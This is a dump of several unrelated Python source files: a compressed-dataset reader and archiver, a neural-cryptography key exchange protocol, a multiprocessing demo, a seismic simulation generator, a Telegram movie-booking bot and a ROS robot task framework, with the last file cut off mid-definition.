paxfilesize = None
else:
size = int(hdr[124:135], 8)
padded_size = ceil(size / 512) * 512
# for handling PaxHeader files (which contain extra metadata about file size) and directories
# https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_03
type = chr(hdr[156])
if type == 'x':
meta = file.read(padded_size)[:size]
def kv(x):
return x.decode('utf-8').split(' ')[1].split('=')
paxfileattrs = {
kv(x)[0]: kv(x)[1]
for x in meta.split(b'\n') if x
}
paxfilesize = int(paxfileattrs['size'])
offset += padded_size
continue
elif type != '0' and type != '\0':
if streaming:
file.seek(padded_size, os.SEEK_CUR)
else:
file.read(padded_size)
offset += padded_size
continue
if streaming:
# skip directory entries
if size != 0:
mmo = mmap.mmap(file.fileno(), length=offset + size, access=mmap.ACCESS_READ)
mmo.seek(offset)
yield mmo
file.seek(padded_size, os.SEEK_CUR)
else:
yield file.read(padded_size)[:size]
offset += padded_size
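# Hedged usage sketch (added for illustration, not part of the original module): iterating
# the members of a tarball with `tarfile_reader`. The archive path below is hypothetical.
def _example_iterate_tar(path='archive.tar'):
    """Print the size of every regular file yielded by tarfile_reader."""
    with open(path, 'rb') as fh:
        for member_bytes in tarfile_reader(fh, streaming=False):
            # with streaming=False each yielded item is the raw bytes of one member
            print(len(member_bytes))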
# def handle_jsonl(jsonl_reader, get_meta, autojoin_paragraphs, para_joiner, key='text'):
# """
# OBSOLETE
# """
# for ob in jsonl_reader:
# # naive jsonl where each object is just the string itself, with no meta. For legacy compatibility.
# if isinstance(ob, str):
# assert not get_meta
# yield ob
# continue
# #TODO : reading file name of the datapoint and pass the FilterData util
# if filter_data_class.filter_file_extension(ob):
# text = ob[key]
# text = ob["file_name"] + r"#@#@#" + text
# if autojoin_paragraphs and isinstance(text, list):
# text = para_joiner.join(text)
# if get_meta:
# yield text, (ob['meta'] if 'meta' in ob else {})
# else:
# yield text
# else:
# pass
class Reader:
    def __init__(self, in_path, extension_path):
self.in_path = in_path
self.filter_data_class = FilterData(extension_path)
self.spl_split_token = r"_#@#_" #special split token to take out the file extension.
def stream_data(self, get_meta=False, threaded=False):
if not threaded:
yield from self._stream_data(get_meta)
return
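        # threaded=True: run _stream_data in a separate process and hand documents back
        # through a bounded multiprocessing.Queue; a None sentinel marks the end of the stream.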
q = mp.Queue(1000)
p = mp.Process(target=self._stream_data_threaded, args=(q, get_meta))
p.start()
while p.is_alive():
res = q.get()
if res is None: break
yield res
def _stream_data_threaded(self, q, get_meta=False):
for data in self._stream_data(get_meta):
q.put(data)
q.put(None)
def _stream_data(self, get_meta=False, jsonl_key="text"):
self.f_name = ""
files = listdir_or_file(self.in_path)
if not files:
raise FileNotFoundError(f"No valid file(s) found in {self.in_path}")
for f in files:
self.f_name = f
if f == 'openwebtext.tar.xz':
assert not get_meta
yield from self.read_owt(f)
elif 'urlsf_subset' in f and f.endswith('_data.xz'):
assert not get_meta
yield from self.read_owt_subset(f)
elif f.endswith('.dat.zst'):
assert not get_meta
yield from self.read_dat(f)
elif f.endswith('.jsonl'):
yield from self.read_jsonl(f, get_meta, key=jsonl_key)
elif f.endswith('.jsonl.zst'):
yield from self.read_jsonl_zst(f, get_meta, key=jsonl_key)
elif f.endswith('.jsonl.zst.tar'):
                yield from self.read_jsonl_tar(f, get_meta, key=jsonl_key)
elif f.endswith('.json.zst'):
assert not get_meta
yield from self.read_json(f)
elif f.endswith('.txt'):
assert not get_meta
yield from self.read_txt(f)
elif f.endswith('.zip'):
assert not get_meta
yield from self.read_zip(f)
elif f.endswith('.tar.gz'):
assert not get_meta
yield from self.read_tgz(f)
elif f.endswith('.json.gz'):
assert not get_meta
yield from self.read_jsongz(f)
elif f.endswith('.gz'):
assert not get_meta
yield from self.read_gz(f)
else:
# shouldn't be reached
print(f'Skipping {f} as streaming for that filetype is not implemented')
#adding "stat_logs/pl_stat.json" logging
#self.log_stat_json(self.filter_data_class.stat_extension)
def read_txt(self, file):
with open(file, 'r') as fh:
yield fh.read()
def read_zip(self, file):
archive = ZipFile(file, 'r')
for f in archive.namelist():
yield archive.read(f).decode('UTF-8')
def read_tgz(self, file):
gz = gzip.open(file)
yield from (x.decode('utf-8') for x in tarfile_reader(gz, streaming=False))
def read_gz(self, file):
with gzip.open(file, 'rb') as f:
for line in f:
yield line.decode('utf-8')
def read_jsongz(self, file):
for line in self.read_gz(file):
yield json.loads(line)
def read_json(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
ob = json.load(reader)
yield from ob
def read_dat(self, file):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = cctx.stream_reader(fh)
while True:
ln = reader.read(16).decode('UTF-8')
if not ln:
break
ln = int(ln)
yield reader.read(ln).decode('UTF-8')
def read_jsonl(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with jsonlines.open(file) as rdr:
yield from self.handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
def read_jsonl_zst(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(fh))
rdr = jsonlines.Reader(reader)
yield from self.handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
def read_jsonl_tar(self, file, get_meta=False, autojoin_paragraphs=True, para_joiner='\n\n', key='text'):
with open(file, 'rb') as fh:
for f in tarfile_reader(fh, streaming=True):
cctx = zstandard.ZstdDecompressor()
reader = io.BufferedReader(cctx.stream_reader(f))
rdr = jsonlines.Reader(reader)
yield from self.handle_jsonl(rdr, get_meta, autojoin_paragraphs, para_joiner, key)
f.close()
def read_owt(self, file):
tar = tarfile.open(file, encoding='utf-8')
utf8reader = codecs.getreader('utf-8')
for name in tar.getmembers():
fp = tar.extractfile(name)
inner_tar = tarfile.open(fileobj=fp, encoding='utf-8')
for inner_name in inner_tar.getmembers():
inner_fp = utf8reader(inner_tar.extractfile(inner_name))
contents = inner_fp.read()
yield contents
def read_owt_subset(self, file):
utf8reader = codecs.getreader('utf-8')
tar = tarfile.open(file, encoding='utf-8')
for name in tar.getmembers():
fp = utf8reader(tar.extractfile(name))
contents = fp.read()
yield contents
def handle_jsonl(self,jsonl_reader, get_meta, autojoin_paragraphs, para_joiner, key='text'):
for ob in jsonl_reader:
# naive jsonl where each object is just the string itself, with no meta. For legacy compatibility.
if isinstance(ob, str):
assert not get_meta
yield ob
continue
#TODO : reading file name of the datapoint and pass the FilterData util
filter_flag = self.filter_data_class.filter_file_extension(ob) #reshinth - Changed meta to file utils.
if filter_flag:
text = ob[key]
text = ob["meta"]["file_name"] + self.spl_split_token + text
if autojoin_paragraphs and isinstance(text, list):
text = para_joiner.join(text)
if get_meta:
yield text, (ob['meta'] if 'meta' in ob else {})
else:
yield text
else:
pass
class Archive:
def __init__(self, out_dir, compression_level=3):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.i = 0
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.cctx = zstandard.ZstdCompressor(level=compression_level, threads=8)
self.compressor = self.cctx.stream_writer(self.fh)
def add_data(self, data, meta={}):
self.compressor.write(json.dumps({'text': data, 'meta': meta}).encode('UTF-8') + b'\n')
def commit(self, archive_name='default'):
fname = self.out_dir + '/data_' + str(self.i) + '_time' + str(int(time.time())) + '_' + archive_name + '.jsonl.zst'
self.compressor.flush(zstandard.FLUSH_FRAME)
self.fh.flush()
self.fh.close()
os.rename(self.out_dir + '/current_chunk_incomplete', fname)
self.fh = open(self.out_dir + '/current_chunk_incomplete', 'wb')
self.compressor = self.cctx.stream_writer(self.fh)
self.i += 1
class DatArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self, archive_name=None):
# TODO: streaming
cctx = zstandard.ZstdCompressor(level=3)
if archive_name is None:
archive_name = str(int(time.time()))
res = b''.join(map(lambda x: ("%016d" % len(x)).encode('UTF-8') + x, map(lambda x: x.encode('UTF-8'), self.data)))
cdata = cctx.compress(res)
with open(self.out_dir + '/data_' + str(self.i) + '_' + archive_name + '.dat.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
class JSONArchive:
def __init__(self, out_dir):
self.out_dir = out_dir
os.makedirs(out_dir, exist_ok=True)
self.data = []
self.i = 0
if os.path.exists(out_dir) and len(os.listdir(out_dir)) > 0:
self.i = max(map(lambda x: int(x.split('_')[1].split('.')[0]), os.listdir(out_dir))) + 1
def add_data(self, data):
self.data.append(data)
def commit(self):
cctx = zstandard.ZstdCompressor(level=3)
cdata = cctx.compress(json.dumps(self.data).encode('UTF-8'))
with open(self.out_dir + '/data_' + str(self.i) + '_' + str(int(time.time())) + '.json.zst', 'wb') as fh:
fh.write(cdata)
self.i += 1
self.data = []
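# Hedged usage sketch (illustration only, not part of the original module): writing a small
# compressed .jsonl.zst chunk with Archive. The output directory name is hypothetical; reading
# the chunk back with Reader additionally needs a FilterData extension config (see
# code_clippy_data_utils), which is not shown here.
def _example_write_chunk(out_dir='example_chunks'):
    ar = Archive(out_dir)
    ar.add_data('def add(a, b):\n    return a + b\n', meta={'file_name': 'add.py'})
    ar.add_data('print("hello")\n', meta={'file_name': 'hello.py'})
    # commit() flushes the zstd frame and renames the open chunk to
    # data_0_time<timestamp>_demo.jsonl.zst inside out_dir
    ar.commit(archive_name='demo')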
|
protocol.py
|
from twisted.internet.protocol import Protocol
from twisted.internet.protocol import Factory
from twisted.internet.endpoints import TCP4ServerEndpoint
from twisted.internet import reactor
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from threading import Thread
from tpm import *
import json
import base64
# Used to access the index in the exchanged messages
MESSAGE_TYPE = 0
MESSAGE = 1
# The types of the messages exchanged
TYPE_INPUTS = 0
TYPE_OUTPUT_SERVER = 1
TYPE_OUTPUT_CLIENT = 2
TYPE_ACK = 3
TYPE_TEST = 4
TYPE_TEST_OK = 5
TYPE_MESSAGE = 6
SYNC_THRESHOLD = 20
TEST_MESSAGE = 'SYNCED'
class NeuralCryptography(Protocol):
def __init__(self):
        self.tpm = TreeParityMachine(4, 3)
self.count = 0
self.syncronized = False
self.key = None
self.cipher = None
def syncronizer(self, data):
data = json.loads(data)
if self.count == SYNC_THRESHOLD:
self.test_sync()
elif data[MESSAGE_TYPE] == TYPE_INPUTS:
self.receive_inputs(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_OUTPUT_SERVER:
self.receive_output_from_server(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_OUTPUT_CLIENT:
self.receive_output_from_client(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_ACK:
self.receive_ack()
elif data[MESSAGE_TYPE] == TYPE_TEST:
self.receive_test(data[MESSAGE])
elif data[MESSAGE_TYPE] == TYPE_TEST_OK:
self.receive_test_ok()
def receive_inputs(self, inputs):
self.tpm(inputs)
self.transport.write(json.dumps([TYPE_OUTPUT_SERVER, self.tpm.y]))
def receive_output_from_server(self, output):
self.transport.write(json.dumps([TYPE_OUTPUT_CLIENT, self.tpm.y]))
if self.tpm.y == output:
self.count += 1
self.tpm.train()
else:
self.count = 0
def receive_output_from_client(self, output):
if self.tpm.y == output:
self.count += 1
self.tpm.train()
else:
self.count = 0
self.transport.write(json.dumps([TYPE_ACK, 0]))
def receive_ack(self):
self.tpm.generate_inputs()
self.tpm(self.tpm.x)
self.transport.write(json.dumps([TYPE_INPUTS, self.tpm.x]))
def synced(self):
return self.syncronized
def test_sync(self):
self.count = 0
self.generate_key()
self.cipher = AES.new(self.key, AES.MODE_CBC)
ciphertext = self.cipher.encrypt(self.pad(TEST_MESSAGE.encode('utf-8')))
ciphertext = base64.b64encode(ciphertext)
self.transport.write(json.dumps([TYPE_TEST, ciphertext]))
def receive_test(self, ciphertext):
self.generate_key()
self.cipher = AES.new(self.key, AES.MODE_CBC)
ciphertext = base64.b64decode(ciphertext)
plaintext = self.cipher.decrypt(ciphertext)
plaintext = self.unpad(plaintext)
if plaintext == TEST_MESSAGE:
self.transport.write(json.dumps([TYPE_TEST_OK, TEST_MESSAGE]))
self.syncronized = True
            print(self.tpm.weights())
self.start_service()
else:
self.transport.write(json.dumps([TYPE_ACK, 0]))
def receive_test_ok(self):
self.syncronized = True
self.start_service()
        print(self.tpm.weights())
def generate_key(self):
seed = str(self.tpm.weights())
sha = SHA256.new()
sha.update(seed)
self.key = sha.digest()
return self.key
def pad(self, s):
BS = 16
return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
def unpad(self, s):
return s[0:-ord(s[-1])]
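    # Worked padding example (illustrative): with BS = 16, pad('SYNCED') appends ten
    # chr(10) characters so the length becomes a full 16-byte block; unpad reads the
    # last character (value 10) and strips that many characters, recovering 'SYNCED'.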
def call(self, target, args):
self.thread = Thread(target=target, args=(args))
def receive(self, target):
self.data_received = target
def start_service(self):
self.thread.start()
def received(self, data):
data = json.loads(data)
ciphertext = data[MESSAGE]
ciphertext = base64.b64decode(ciphertext)
plaintext = self.cipher.decrypt(ciphertext)
plaintext = self.unpad(plaintext)
self.data_received(plaintext)
def send_message(self, data):
ciphertext = self.cipher.encrypt(self.pad(data))
ciphertext = base64.b64encode(ciphertext)
self.transport.write(json.dumps([TYPE_MESSAGE, ciphertext]))
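# Hedged wiring sketch (illustration only, not part of the original file): serving the
# protocol with the Twisted imports above. The port number is arbitrary.
class NeuralCryptographyFactory(Factory):
    def buildProtocol(self, addr):
        return NeuralCryptography()

def run_server(port=8123):
    endpoint = TCP4ServerEndpoint(reactor, port)
    endpoint.listen(NeuralCryptographyFactory())
    reactor.run()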
|
concurrency_06.py
|
import multiprocessing
manager = multiprocessing.Manager()
namespace = manager.Namespace()
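# Note: a manager Namespace shares top-level attribute *assignment* between processes;
# in-place mutation of a nested object (e.g. namespace.second['value'] = 0) is not
# propagated, because the proxy only intercepts attribute get/set.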
def set_first_variable():
namespace.first = 42
p = multiprocessing.Process(target=set_first_variable)
p.start()
p.join()
def set_second_variable():
namespace.second = dict(value=42)
p = multiprocessing.Process(target=set_second_variable)
p.start()
p.join()
import datetime
def set_custom_variable():
namespace.last = datetime.datetime.utcnow()
p = multiprocessing.Process(target=set_custom_variable)
p.start()
p.join()
def print_variables():
print(namespace.first, namespace.second, namespace.last)
p = multiprocessing.Process(target=print_variables)
p.start()
p.join()
|
generate_forward_simulations_fault_2ms_r.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 4 13:38:15 2019
@author: bmoseley
"""
import shutil
import sys
import numpy as np
import multiprocessing, queue
import time
sys.path.insert(0, '../shared_modules/')
import io_utils
from helper import run_command
### TODO:
#
# Consider writing my own fortran code e.g using f2py
# to keep everything in memory
# it appears fortran is much quicker than numpy for seismiccpml
#### PARAMETERS
#VEL_RUN = "layers"
#SIM_RUN = "layers_2ms"
VEL_RUN = "fault"
SIM_RUN = "fault_2ms_r"
if 'linux' in sys.platform.lower(): ROOT_DIR = "/data/greypartridge/not-backed-up/aims/aims17/bmoseley/DPhil/Mini_Projects/DIP/forward_seisnets_paper/generate_data/"
else: ROOT_DIR = ""
#N_VELS = 50000
N_VELS = 100000
SEED = 123
#QC_FREQ = 5000 # when to output full wavefield or not (I/O heavy)
#n_processes = 6
QC_FREQ = 10000 # when to output full wavefield or not (I/O heavy)
n_processes = 42
## For WAVENET
#RANDOMSOURCE = False
#N_REC = 11
#DELTAREC = 50.0 # receiver spacing (m)
## For AUTOENCODER
RANDOMSOURCE = True
N_REC = 32
DELTAREC = 15.0 # receiver spacing (m)
##
SOURCE_Yi = 14# source depth
##
NX = 128
NY = 128
DELTAX = 5. # grid spacing (m)
DELTAY = 5. # grid spacing (m)
NPOINTS_PML = 10 # number of PML points
NSTEPS = 512*4
DELTAT = 0.0005 # sample rate for FD modelling (s)
ds = 4# downsample factor (for pre-processing)
##
####
np.random.seed(SEED)
## Place sources
if RANDOMSOURCE:# 3 sources per velocity model
source_is = np.random.randint(4+NPOINTS_PML, NX-NPOINTS_PML-4, (N_VELS, 3, 1))
source_is = np.concatenate([source_is, SOURCE_Yi*np.ones((N_VELS, 3, 1), dtype=int)], axis=2)
else:# 1 source per velocity model
source_is = np.concatenate([(NX//2)*np.ones((N_VELS, 1, 1), dtype=int), SOURCE_Yi*np.ones((N_VELS, 1, 1), dtype=int)], axis=2)
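# Receivers: N_REC positions spaced DELTAREC metres apart, centred on the model in x and all
# at depth index SOURCE_Yi; positions in metres are converted to grid indices via DELTAX.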
receiver_is = np.array([int(np.floor( (DELTAX*NX/2. -(N_REC-1)*DELTAREC/2. + i*DELTAREC) / DELTAX) ) for i in range(N_REC)])
receiver_is = np.concatenate([receiver_is.reshape((N_REC,1)), SOURCE_Yi*np.ones((N_REC, 1), dtype=int)], axis=1)
print(source_is)
print()
print(receiver_is)
print()
def generate_example(ivel):
SIM_NUM = ivel
VEL_FILE = VEL_DIR + "velocity_%.8i.txt"%(ivel)
if SIM_NUM % QC_FREQ == 0: OUTPUT_WAVEFIELD = 1
else: OUTPUT_WAVEFIELD = 0# whether to output wavefield (I/O heavy!)
# run a separate simulation for each source
for isource,source_i in enumerate(source_is[SIM_NUM]):
# create a temporary directory for simulation output (prevent I/O clash between processes)
TEMP_OUT_SIM_DIR = OUT_SIM_DIR + str(SIM_NUM) + "/"
io_utils.get_dir(TEMP_OUT_SIM_DIR)
# create receiver file
RECEIVER_FILE = TEMP_OUT_SIM_DIR + "receiver_ijs_%s_%i.txt"%(SIM_RUN,SIM_NUM)
with open(RECEIVER_FILE,'w') as f:
f.write("%i\n"%(N_REC))
for rec_i in receiver_is: f.write("%i %i\n"%(rec_i[0]+1, rec_i[1]+1))# SEISMIC CPML uses indices starting at 1
# create source file (single source)
SOURCE_FILE = TEMP_OUT_SIM_DIR + "source_ijs_%s_%i.txt"%(SIM_RUN,SIM_NUM)
with open(SOURCE_FILE,'w') as f:
f.write("%i\n"%(1))
f.write("%i %i\n"%(source_i[0]+1, source_i[1]+1))# SEISMIC CPML uses indices starting at 1
# RUN FORWARD SIMULATION
cmd = "./xben_seismic_CPML_2D_pressure_second_order " + \
"%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s"%(
NSTEPS,
NX,
NY,
DELTAX,
DELTAY,
DELTAT,
NPOINTS_PML,
0,# SOURCE_X (m)
0,# SOURCE_Z (m)
SOURCE_FILE,
VEL_FILE,
TEMP_OUT_SIM_DIR,
SIM_NUM,
RECEIVER_FILE,
OUTPUT_WAVEFIELD)
return_code = run_command(cmd.split(" "),verbose=False) # run
if return_code != 0:
print("ERROR: Simulation %i, %i broke, check stderr"%(ivel, isource))
# CLEAR INTERMEDIARY FILES (CAREFUL !)
io_utils.remove_dir(TEMP_OUT_SIM_DIR)
return False
# IMPORT GATHER INTO NUMPY
gather = np.zeros((N_REC, NSTEPS), dtype=np.float32)
file = TEMP_OUT_SIM_DIR + "gather_%.8i.bin"%(SIM_NUM)
        # Read each binary gather file (much quicker than reading text files, because it is a direct binary read)
with open(file,'rb') as f:
            # Note: SEISMIC_CPML saves double precision (64-bit) floats; we downcast to 32-bit floats
            # count = number of items (np.float64 values) to read
for irec in np.arange(N_REC): gather[irec,:] = np.fromfile(f, dtype=np.float64, count = NSTEPS).astype(np.float32)
# PRE-PROCESSING
gather_decimated = np.copy(gather)# important to copy
gather_decimated = gather_decimated[:,::ds]# DOWNSAMPLE GATHER
# SAVE
np.save(OUT_SIM_DIR + "gather_%.8i_%.8i.npy"%(SIM_NUM,isource), gather_decimated)
# IMPORT WAVEFIELDS INTO NUMPY (for QC)
if OUTPUT_WAVEFIELD:
wavefields = np.zeros((NSTEPS,NX,NY), dtype=np.float32)
files = [TEMP_OUT_SIM_DIR + "wavefield_%.8i_%.8i.bin"%(SIM_NUM, i+1) for i in range(NSTEPS)]# SEISMIC CPML uses indices starting at 1
for i in range(NSTEPS):
                # Read each binary wavefield file (much quicker than reading text files, because it is a direct binary read)
with open(files[i],'rb') as f:
                    # Note: SEISMIC_CPML saves double precision (64-bit) floats; we downcast to 32-bit floats
                    # count = number of items (np.float64 values) to read
for iz in np.arange(NY): wavefields[i,:,iz] = np.fromfile(f, dtype=np.float64, count = NX).astype(np.float32)
np.save(OUT_SIM_DIR + "wavefields_%.8i_%.8i.npy"%(SIM_NUM,isource), wavefields)
np.save(OUT_SIM_DIR + "gather_raw_%.8i_%.8i.npy"%(SIM_NUM,isource), gather)
# CLEAR INTERMEDIARY FILES (CAREFUL !)
io_utils.remove_dir(TEMP_OUT_SIM_DIR)
return True
def worker_function(taskQ, resultQ):
"""Try to get a ivel from tastQ to run. If sucessful, run forward modelling and push result to resultQ.
If taskQ is empty, terminate."""
while True:
        try: ivel = taskQ.get(block=True, timeout=10)# try to get the next task (ivel number), allowing some time in case of queue contention
except queue.Empty: break# kill process if no more tasks left
example = generate_example(ivel)
resultQ.put(example)# push the example to the results queue
if __name__ == "__main__":
# initiate
VEL_DIR = ROOT_DIR + "velocity/" + VEL_RUN + "/"
OUT_SIM_DIR = ROOT_DIR + "gather/" + SIM_RUN + "/"
# clear output directory for all simulations
io_utils.get_dir(OUT_SIM_DIR)
#save copy of this script for future reference
    shutil.copyfile(__file__, OUT_SIM_DIR + 'generate_forward_simulations_%s.py'%(SIM_RUN))
# save source, receiver positions
np.save(OUT_SIM_DIR + "source_is.npy", source_is)
np.save(OUT_SIM_DIR + "receiver_is.npy", receiver_is)
# make queues
taskQ = multiprocessing.Queue()
resultQ = multiprocessing.Queue()
# push simulations to queues
for ivel in range(N_VELS): taskQ.put(ivel)
workers = [multiprocessing.Process(target=worker_function, args=(taskQ, resultQ)) for _ in range(n_processes)]
for worker in workers: worker.start()
# listen to results queue and write results to output
count = 0
start = start0 = time.time()
while count != N_VELS:
try:
_ = resultQ.get(False)# try to get next result immediately
count +=1
print("example written (count: %i of %i)"%(count, N_VELS))
            if count % 100 == 0:
                rate = 100./(time.time()-start)
                total = (time.time()-start0)/60.
                print("%.2f examples /sec (%.1f min elapsed)"%(rate, total))
                start = time.time()
                print("Worker statuses: %s"%([worker.exitcode for worker in workers]))
except queue.Empty: pass
print("%i examples written"%(count))
print("Simulations complete")
|
standalone_bot.py
|
import urllib3
import telegram
from bs4 import BeautifulSoup
import time
import requests
from lxml import html
import argparse
from urllib.parse import urlparse
import threading
CHECKING = "Sorry bookings are not open for Movie you wanted, Don't worry i will be checking and will tell you once it is available."
BOOKING_OPEN = "Hurray ! Bookings open for movie you Wanted ! \n \n {}"
DEFAULT = "Hello There, Welcome to movie_reminder_bot send me messages using the following format - MU:url1,url2"
BUTTON_CLASS = "showtimes btn _cuatro"
NO_MESSAGE = "No Messages yet ..."
STD_HEADERS = {"User-Agent": "Magic Browser"}
CONTENT_TYPE = "lxml"
URL_FORMAT = "http"
SENDING = "sending message ..."
THREAD_NAME = "requester"
SNOOZE_TIME = 10
BOOK_MSG = "Booking message sent..."
CHECKING_MSG = "Checking message sent..."
class User:
USER_MAPPING = {}
    def analyze_message(self, chat_id, message):
        if URL_FORMAT not in message:
            return False
        # DEFAULT promises the "MU:url1,url2" format, so split off the prefix and
        # accept a comma-separated list of URLs.
        urls = [u.strip() for u in message.split(":", 1)[1].split(",") if u.strip()]
        if not urls:
            return False
        self.USER_MAPPING.setdefault(chat_id, []).extend(urls)
        return True
class Check_Movie(User):
def __init__(self, bot_key):
super().__init__()
self.bot = telegram.Bot(token=bot_key)
self.monitor()
self.update_id = None
self._start_message_processing()
    def _start_message_processing(self):
        while True:
            self.chat, self.msg = self._get_updates()
            if self.chat and self.msg:
                if self.analyze_message(self.chat, self.msg):
                    for chat_id, msg in self.USER_MAPPING.items():
                        self._make_request(chat_id, msg)
                else:
                    # Not a recognised request; reply with the usage hint.
                    self.send_message(self.bot, self.chat, DEFAULT)
            time.sleep(5)
    def _get_updates(self):
        try:
            updates = self.bot.get_updates(offset=self.update_id, timeout=5)
        except TimeoutError:
            return None, None
if len(updates) == 0:
print(NO_MESSAGE)
return None, None
else:
resp = updates.pop()
chat_id = resp.message.chat_id
msg = resp.message.text
self.update_id = resp.update_id + 1
return chat_id, msg
def _make_request(self, chat_id, url):
for movie_url in url:
self._do_request_bookmyshow(chat_id, movie_url)
def _do_request_bookmyshow(self, chat_id, url):
response = requests.get(url, headers=STD_HEADERS)
soup = BeautifulSoup(response.content, CONTENT_TYPE)
data = soup.find_all(class_=BUTTON_CLASS)
if len(data) == 1:
self.send_message(self.bot, chat_id, BOOKING_OPEN.format(url))
print(BOOK_MSG)
else:
self.send_message(self.bot, chat_id, CHECKING)
print(CHECKING_MSG)
def send_message(self, bot, c_id, message):
print(SENDING)
bot.send_message(c_id, message)
def requester(self):
while True:
if len(self.USER_MAPPING.keys()) != 0:
for chat_id, msg in self.USER_MAPPING.items():
self._make_request(chat_id, msg)
time.sleep(SNOOZE_TIME)
def monitor(self):
d = threading.Thread(name=THREAD_NAME, target=self.requester)
        d.daemon = True
d.start()
class CheckService(Check_Movie):
def __init__(self):
parser = argparse.ArgumentParser(description="Movie Availablity Check API.")
parser.add_argument("-BK", "--bot-key", type=str, help="Attach bot_key.")
args = parser.parse_args()
super().__init__(args.bot_key)
if __name__ == "__main__":
CheckService()
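# Typical invocation (the token placeholder is illustrative):
#   python standalone_bot.py --bot-key <TELEGRAM_BOT_TOKEN>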
|
base.py
|
#!/usr/bin/env python
import json
import threading
import actionlib
import dynamic_reconfigure.client
from geometry_msgs.msg import PoseWithCovarianceStamped
import rospy
import std_msgs.msg as ros_msg
from std_srvs.srv import Empty, EmptyRequest, EmptyResponse
from kobuki_msgs.msg import WheelDropEvent
from needybot.services.base import BaseService, BaseServiceClient
from needybot.lib import cable
import needybot.lib.channels as nb_channels
from needybot.lib.logger import *
from needybot.lib.patterns import Singleton
from needybot.lib.needybot_blackboard import NeedybotBlackboard
from needybot.lib.task_latcher import TaskLatcher
from needybot.lib.utils import build_payload
from needybot_srvs.srv import *
class TaskStepStatus(object):
    FAILURE = 'failure'
    RUNNING = 'running'
    SUCCESS = 'success'
    TIMEOUT = 'timeout'
class TaskStep(object):
    def __init__(self, name, blocking=False, timeout=0, success_step='complete', failure_step='abort',
                 timeout_step='abort', entered_handler=None, exited_handler=None, screen_delay=0, instructions=None):
        self.timeout = timeout
        self.name = name  # This step's name
        self.success_step = success_step  # Tells the task server which step to move to when we receive a success message from the usb screen
        self.failure_step = failure_step  # Step to move to when we receive a failure response from the usb screen
        self.timeout_step = timeout_step  # Step to move to when we receive a timeout response from the usb screen
        self.entered_handler = entered_handler  # Callback for when the step is entered
        self.exited_handler = exited_handler  # Callback for when the step is exited
        self.blocking = blocking
        self.screen_delay = screen_delay  # Referenced by payload()
        self.instructions = instructions
        self._task_name = ''
@property
def task_name(self):
return self._task_name
@task_name.setter
def task_name(self, val):
self._task_name = val
self.failure_pub = rospy.Publisher(
'/needybot/{}/step/failure'.format(self._task_name),
ros_msg.Empty,
queue_size=1
)
self.success_pub = rospy.Publisher(
'/needybot/{}/step/success'.format(self._task_name),
ros_msg.Empty,
queue_size=1
)
def enter(self):
if self.entered_handler:
self.entered_handler(self)
def exit(self):
if self.exited_handler:
self.exited_handler(self)
def fail(self):
self.failure_pub.publish(ros_msg.Empty())
def payload(self):
return {
'name': self.name,
'success_step': self.success_step,
'failure_step': self.failure_step,
'timeout': self.timeout,
'screen_delay': self.screen_delay
}
def succeed(self):
self.success_pub.publish(ros_msg.Empty())
class TaskStepSequence(object):
def __init__(self, steps, task_name, step_prefix=None):
if len(steps) == 0:
logerr("TaskStepSequence must have 1 or more steps.")
self.nb_blackboard = NeedybotBlackboard()
# Setup steps dictionary
self.steps = {}
self.step_prefix = step_prefix
for step in steps:
# Add prefix to step names
step.name = self.prefix_name(step.name)
self.steps[step.name] = step
self.task_name = task_name
def prefix_name(self, step_name):
if self.step_prefix:
return '{}_{}'.format(self.step_prefix, step_name)
return step_name
@property
def task_name(self):
return self._task_name
@task_name.setter
def task_name(self, val):
self._task_name = val
self.step_serve_pub = rospy.Publisher(
'/needybot/{}/step/serve'.format(self._task_name),
ros_msg.String,
queue_size=1
)
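# Hedged illustration (not part of the original module): shows how TaskStepSequence
# applies step_prefix to its step names. All names below are invented, and the
# function is never called here; constructing the sequence requires a running ROS
# node because the task_name setter creates a publisher.
def _example_step_sequence():
    seq = TaskStepSequence(
        [TaskStep('intro', success_step='wave'), TaskStep('wave')],
        task_name='example_task',
        step_prefix='greet'
    )
    return sorted(seq.steps.keys())  # -> ['greet_intro', 'greet_wave']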
class Task(BaseService):
"""
Parent class for all Needybot tasks.
Uses the singleton pattern to ensure that child tasks are only ever created
once each.
"""
def __init__(self, name):
super(Task, self).__init__(name, rospy.Rate(50))
self.nb_blackboard = NeedybotBlackboard()
self.lock = threading.Lock()
# Flags
self.active = False
self.completed = False
self.did_fail = False
self.current_step = None
self.name = name
self.subscribers = []
self.step_timer = None
self.steps = {}
self.task_latcher = TaskLatcher()
self.task_latcher.register_task()
self.step_load_time = None
self.paused_time = None
self.paused = False
self.register_services([
('abort', AbortTask),
('step_name', Message),
('next_step', NextStep),
('task_payload', TaskPayload),
('reset', Empty),
('status', TaskStatus),
('step', StepTask)
])
self.add_steps([
TaskStep(
'load',
failure_step='abort',
success_step='complete',
entered_handler=self.load_entered
),
TaskStep(
'complete',
entered_handler=self.complete_entered
),
TaskStep(
'abort',
entered_handler=self.abort_entered,
blocking=True
),
])
def abort(self, req=None):
"""
        Service function for aborting the task ('[name]_abort').
